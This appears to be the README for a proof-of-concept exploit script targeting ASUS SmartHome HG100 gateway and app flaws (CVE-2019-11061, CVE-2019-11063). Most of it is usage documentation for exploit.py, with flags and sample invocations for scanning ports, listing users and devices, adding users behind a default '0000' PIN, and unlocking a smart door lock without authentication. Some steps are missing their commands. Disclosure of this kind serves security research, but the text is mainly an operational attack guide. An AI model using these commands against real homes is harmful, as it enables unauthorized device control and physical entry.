CVE-2019-11061 : Broken access control in HG100
Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09
CVE-2019-11063 : Broken access control in SmartHome app
Affected products : ASUS SmartHome Android APP version < 3.0.45_190701
If the attacker is on the same internal network as the HG100 or a mobile device with the companion APP(android or iPhone). The attacker can send control requests to them.
- The attacker then does not need any authentication to do the following:
- 1. Get all user names that have been added to the HG100.
- 2. Get all devices information under the SmartHome Gateway(HG100).
- 3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.
- The following need password (4 to 6 digits, default: "0000") :
- 1. Add users to HG100.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
Note: 2019/5/15 - ASUS release update for SmartHome APP(3.0.42_190515) and Gateway(4.00.06). And added SSL to HTTP service. But this vulnerability still exists. For this update, you need to specify protocal when using the "cmd" argument. For example:
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Scan mobile device (installed the companion APP for android or iPhone) exploitable port :
P.S. The -v
option will list the users that have been added to the HG100.
or
Get all user that have been added to the HG100:
Note: use https://10.42.50.166:8083 for "cmd" argument.
For example:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Get all devices information under the SmartHome Gateway:
P.S. If the --user
option is not set, the first user in HG100 will be selected automatically. (Because no password is needed)
Control (unlock) the DoorLock.
P.S. the value 1028
get from -l
option(step3).